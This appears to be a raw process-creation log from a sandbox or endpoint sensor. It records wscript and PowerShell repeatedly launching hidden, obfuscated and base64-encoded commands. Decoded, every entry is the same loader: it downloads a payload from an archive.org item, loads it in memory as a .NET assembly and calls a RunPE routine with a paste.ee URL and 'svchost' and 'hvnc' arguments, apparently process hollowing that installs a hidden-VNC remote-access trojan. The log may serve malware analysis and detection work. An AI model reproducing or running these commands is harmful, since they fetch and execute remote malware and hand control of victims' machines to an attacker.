Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
